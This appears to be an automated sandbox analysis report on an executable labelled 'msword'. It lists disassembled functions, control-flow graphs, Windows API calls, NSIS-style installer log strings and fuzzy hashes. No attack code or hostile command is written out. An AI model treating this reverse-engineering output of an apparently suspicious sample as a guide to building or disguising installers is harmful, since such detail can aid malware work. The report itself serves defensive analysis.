                                                                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                        • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                        • API String ID: 3581403547-784952888
                                                                                        • Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                        • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                        • Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                        • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                        Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 886 4074bb-4074c0 887 4074c2-4074ef 886->887 888 40752f-407547 886->888 890 4074f1-4074f4 887->890 891 4074f6-4074fa 887->891 889 407aeb-407aff 888->889 895 407b01-407b17 889->895 896 407b19-407b2c 889->896 892 407506-407509 890->892 893 407502 891->893 894 4074fc-407500 891->894 897 407527-40752a 892->897 898 40750b-407514 892->898 893->892 894->892 899 407b33-407b3a 895->899 896->899 902 4076f6-407713 897->902 903 407516 898->903 904 407519-407525 898->904 900 407b61-407c68 899->900 901 407b3c-407b40 899->901 917 407350 900->917 918 407cec 900->918 906 407b46-407b5e 901->906 907 407ccd-407cd4 901->907 909 407715-407729 902->909 910 40772b-40773e 902->910 903->904 905 407589-4075b6 904->905 913 4075d2-4075ec 905->913 914 4075b8-4075d0 905->914 906->900 911 407cdd-407cea 907->911 915 407741-40774b 909->915 910->915 916 407cef-407cf6 911->916 919 4075f0-4075fa 913->919 914->919 920 40774d 915->920 921 4076ee-4076f4 915->921 922 407357-40735b 917->922 923 40749b-4074b6 917->923 924 40746d-407471 917->924 925 4073ff-407403 917->925 918->916 928 407600 919->928 929 407571-407577 919->929 930 407845-4078a1 920->930 931 4076c9-4076cd 920->931 921->902 927 407692-40769c 921->927 922->911 932 407361-40736e 922->932 923->889 937 407c76-407c7d 924->937 938 407477-40748b 924->938 943 407409-407420 925->943 944 407c6d-407c74 925->944 933 4076a2-4076c4 927->933 934 407c9a-407ca1 927->934 946 407556-40756e 928->946 947 407c7f-407c86 928->947 935 40762a-407630 929->935 936 40757d-407583 929->936 930->889 939 407c91-407c98 931->939 940 4076d3-4076eb 931->940 932->918 948 407374-4073ba 932->948 933->930 934->911 949 40768e 935->949 950 407632-40764f 935->950 936->905 936->949 937->911 945 40748e-407496 938->945 939->911 940->921 951 407423-407427 943->951 944->911 945->924 955 407498 945->955 946->929 947->911 953 4073e2-4073e4 948->953 954 4073bc-4073c0 948->954 949->927 956 407651-407665 950->956 957 407667-40767a 950->957 951->925 952 407429-40742f 951->952 959 407431-407438 952->959 960 407459-40746b 952->960 963 4073f5-4073fd 953->963 964 4073e6-4073f3 953->964 961 4073c2-4073c5 GlobalFree 954->961 962 4073cb-4073d9 GlobalAlloc 954->962 955->923 958 40767d-407687 956->958 957->958 958->935 965 407689 958->965 966 407443-407453 GlobalAlloc 959->966 967 40743a-40743d GlobalFree 959->967 960->945 961->962 962->918 968 4073df 962->968 963->951 964->963 964->964 970 407c88-407c8f 965->970 971 40760f-407627 965->971 966->918 966->960 967->966 968->953 970->911 971->935
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                        • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                        • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                        • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                        Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                                        • String ID:
                                                                                        • API String ID: 310444273-0
                                                                                        • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                        • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                        • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                        • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                        Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                        • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                        • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                        • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                        • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                                                                        Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405619 GetDlgItem * 2 call 403d3f KiUserCallbackDispatcher call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 83 40561e-405626 61->83 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 KiUserCallbackDispatcher * 2 80->90 82->73 87 405905-40590b 82->87 83->60 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                        • ShowWindow.USER32(?), ref: 004054D2
                                                                                        • DestroyWindow.USER32 ref: 004054E6
                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                        • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00405611
                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                        • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                        • EnableWindow.USER32(?,?), ref: 00405757
                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                        • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                        • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                        • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                                                                        • String ID: @rD
                                                                                        • API String ID: 3906175533-3814967855
                                                                                        • Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                        • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                        • Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                        • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                                        Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                                        APIs
                                                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                        • ShowWindow.USER32(?), ref: 00401753
                                                                                        • ShowWindow.USER32(?), ref: 00401767
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                        • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                        Strings
                                                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                        • BringToFront, xrefs: 004016BD
                                                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                        • Rename failed: %s, xrefs: 0040194B
                                                                                        • Call: %d, xrefs: 0040165A
                                                                                        • Aborting: "%s", xrefs: 0040161D
                                                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                        • Rename: %s, xrefs: 004018F8
                                                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                        • Sleep(%d), xrefs: 0040169D
                                                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                                                        • Jump: %d, xrefs: 00401602
                                                                                        • detailprint: %s, xrefs: 00401679
                                                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                        • Rename on reboot: %s, xrefs: 00401943
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                        • API String ID: 2872004960-3619442763
                                                                                        • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                        • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                        • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                        • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                                                                        Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                                        APIs
                                                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                        • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                        • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                        • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                        • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                        • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                          • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
